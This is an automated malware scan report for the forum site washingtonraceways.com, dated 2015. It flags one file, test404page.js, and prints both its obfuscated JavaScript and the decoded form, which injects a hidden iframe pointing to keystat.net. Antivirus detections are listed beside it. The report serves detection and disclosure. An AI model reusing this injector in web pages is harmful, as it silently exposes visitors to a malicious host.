Malware Scanner report for washingtonraceways.com

Malicious/Suspicious/Total URLs checked: 1/0/17
1 page has malicious code. See details below.
Blacklists: OK
Malicious Redirects: OK
Malicious/Hidden/Total iFrames: 0/0/0
Deface / Content modification: OK

Scanned pages/files

Request / Server response / Status
http://washingtonraceways.com/
HTTP/1.1 303 See Other
Connection: close
Date: Tue, 27 Jan 2015 12:52:26 GMT
Location: http://www.washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15
Server: Apache
Content-Length: 0
Content-Type: text/html
Set-Cookie: bb_sessionhash=e024869112f3fde77a165596e24caf15; path=/; HttpOnly
Set-Cookie: bb_lastvisit=1422363147; expires=Wed, 27-Jan-2016 12:52:27 GMT; path=/
Set-Cookie: bb_lastactivity=0; expires=Wed, 27-Jan-2016 12:52:27 GMT; path=/
clean
http://www.washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15
200 OK
Content-Length: 18131
Content-Type: text/html
clean
http://www.washingtonraceways.com/clientscript/vbulletin-core.js?v=422
200 OK
Content-Length: 51946
Content-Type: application/x-javascript
clean
http://washingtonraceways.com/clientscript/vbulletin_activitystream.js?v=422
200 OK
Content-Length: 10072
Content-Type: application/x-javascript
clean
http://washingtonraceways.com/clientscript/vbulletin_md5.js?v=422
200 OK
Content-Length: 5464
Content-Type: application/x-javascript
clean
http://washingtonraceways.com/index.php?s=e024869112f3fde77a165596e24caf15
HTTP/1.1 303 See Other
Connection: close
Date: Tue, 27 Jan 2015 12:52:31 GMT
Location: http://www.washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15
Server: Apache
Content-Length: 0
Content-Type: text/html
Set-Cookie: bb_lastvisit=1422363151; expires=Wed, 27-Jan-2016 12:52:31 GMT; path=/
Set-Cookie: bb_lastactivity=0; expires=Wed, 27-Jan-2016 12:52:31 GMT; path=/
clean
http://www.washingtonraceways.com/test404page.js
404 Not Found
Content-Length: 44551
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var IOI='=sTKn4Ddwl2JrcicjN3L84jI40iZ0VXPwNmJ3YjNwAjM9QWa/8SbvNmLyVGZuFGcvB3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var _0x362a=["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=","","charAt","indexOf","fromCharCode","length"];function I1O(_0x6ea4x2){var _0x6ea4x3=_0x362a[0];var _0x6ea4x4,_0x6ea4x5,_0x6ea4x6,_0x6ea4x7,_0x6ea4x8,_0x6ea4x9,_0x6ea4xa,_0x6ea4xb,_0x6ea4xc=0,_0x6ea4xd=_0x362a[1];do{_0x6ea4x7=_0x6ea4x3[_0x362a[3]](_0x6ea4x2[_0
... 407 bytes are skipped ...
;0xff;if(_0x6ea4x9==64){_0x6ea4xd+=String[_0x362a[4]](_0x6ea4x4);} else {if(_0x6ea4xa==64){_0x6ea4xd+=String[_0x362a[4]](_0x6ea4x4,_0x6ea4x5);} else {_0x6ea4xd+=String[_0x362a[4]](_0x6ea4x4,_0x6ea4x5,_0x6ea4x6);} ;} ;} while(_0x6ea4xc<_0x6ea4x2[_0x362a[5]]);;return _0x6ea4xd;} ;function OO1(_0x6ea4xf){var _0x6ea4x10=_0x362a[1],_0x6ea4xc=0;for(_0x6ea4xc=_0x6ea4xf[_0x362a[5]]-1;_0x6ea4xc>=0;_0x6ea4xc--){_0x6ea4x10+=_0x6ea4xf[_0x362a[2]](_0x6ea4xc);} ;return _0x6ea4x10;} ;eval(I1O(OO1(IOI)));

Decoded script:


if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://keystat.net/' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://keystat.net/');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
... 274 bytes are skipped ...
p:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://keystat.net/');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }
<iframe src='http://keystat.net/' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Antivirus reports:

Qihoo-360: Trojan.Generic
Avast: JS:Includer-AAA [Trj]
Ad-Aware: Trojan.Script.600131
Ikarus: Trojan.Script
nProtect: Trojan.Script.600131
Comodo: TrojWare.JS.Crypt.GG
Emsisoft: Trojan.Script.600131 (B)
Kaspersky: Trojan.JS.Redirector.wa
MicroWorld-eScan: Trojan.Script.600131
NANO-Antivirus: Trojan.Script.Redirector.bqiube
F-Secure: Trojan.Script.600131
Avira: JS/Crypt.GG
GData: Trojan.Script.600131
BitDefender: Trojan.Script.600131

http://apiajax.info/?id=200667
500 Can't connect to apiajax.info:80
Content-Length: 187
Content-Type: text/plain
clean
http://apiajax.info/test404page.js
500 Can't connect to apiajax.info:80
Content-Length: 187
Content-Type: text/plain
clean
http://mobilesniffer.ru/?id=200667
500 Can't connect to mobilesniffer.ru:80
Content-Length: 191
Content-Type: text/plain
clean
http://washingtonraceways.com/register.php?s=e024869112f3fde77a165596e24caf15
200 OK
Content-Length: 24465
Content-Type: text/html
clean
http://washingtonraceways.com/clientscript/vbulletin_ajax_nameverif.js?v=422
200 OK
Content-Length: 2502
Content-Type: application/x-javascript
clean
http://washingtonraceways.com/clientscript/vbulletin_ajax_suggest.js?v=422
200 OK
Content-Length: 8155
Content-Type: application/x-javascript
clean
http://washingtonraceways.com/faq.php?s=e024869112f3fde77a165596e24caf15
200 OK
Content-Length: 17185
Content-Type: text/html
clean
http://washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15
200 OK
Content-Length: 18127
Content-Type: text/html
clean
http://washingtonraceways.com/search.php?s=e024869112f3fde77a165596e24caf15&do=getnew&contenttype=vBForum_Post
200 OK
Content-Length: 15217
Content-Type: text/html
clean
http://washingtonraceways.com/search.php?s=e024869112f3fde77a165596e24caf15&do=getnew&contenttype=vBForum_Event
200 OK
Content-Length: 15267
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: washingtonraceways.com

Result:
HTTP/1.1 303 See Other
Connection: close
Date: Tue, 27 Jan 2015 12:52:26 GMT
Location: http://www.washingtonraceways.com/activity.php?s=e024869112f3fde77a165596e24caf15
Server: Apache
Content-Length: 0
Content-Type: text/html
Set-Cookie: bb_sessionhash=e024869112f3fde77a165596e24caf15; path=/; HttpOnly
Set-Cookie: bb_lastvisit=1422363147; expires=Wed, 27-Jan-2016 12:52:27 GMT; path=/
Set-Cookie: bb_lastactivity=0; expires=Wed, 27-Jan-2016 12:52:27 GMT; path=/

...0 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: washingtonraceways.com
Referer: http://www.google.com/search?q=washingtonraceways.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=washingtonraceways.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://washingtonraceways.com/

Result: washingtonraceways.com is not infected or malware details are not published yet.